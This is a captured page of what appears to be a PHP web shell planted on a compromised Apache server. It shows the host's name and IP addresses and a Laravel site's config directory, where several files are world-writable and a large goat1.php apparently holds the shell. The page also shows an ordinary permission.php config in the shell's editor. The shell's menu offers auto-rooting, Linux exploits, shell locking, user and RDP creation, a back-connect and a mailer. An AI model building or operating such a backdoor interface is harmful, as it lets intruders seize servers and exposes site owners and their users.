Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo10.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
app.php
1004
B
-rw-rw-rw-
auth.php
743
B
-rw-rw-rw-
cache.php
644
B
-rw-rw-rw-
database.php
2.1
KB
-rw-rw-rw-
filesystems.php
593
B
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
permission.php
1.16
KB
-rw-rw-rw-
queue.php
480
B
-rw-rw-rw-
session.php
792
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : permission.php
<?php return [ 'models' => [ 'permission' => Spatie\Permission\Models\Permission::class, 'role' => Spatie\Permission\Models\Role::class, ], 'table_names' => [ 'roles' => 'roles', 'permissions' => 'permissions', 'model_has_permissions' => 'model_has_permissions', 'model_has_roles' => 'model_has_roles', 'role_has_permissions' => 'role_has_permissions', ], 'column_names' => [ 'role_pivot_key' => null, 'permission_pivot_key' => null, 'model_morph_key' => 'model_id', 'team_foreign_key' => 'team_id', ], 'register_permission_check_method' => true, 'register_octane_reset_listener' => false, 'events_enabled' => false, 'teams' => false, 'team_resolver' => Spatie\Permission\DefaultTeamResolver::class, 'use_passport_client_credentials' => false, 'display_permission_in_exception' => false, 'display_role_in_exception' => false, 'enable_wildcard_permission' => false, 'cache' => [ 'expiration_time' => DateInterval::createFromDateString('24 hours'), 'key' => 'spatie.permission.cache', 'store' => 'default', ], ];
Close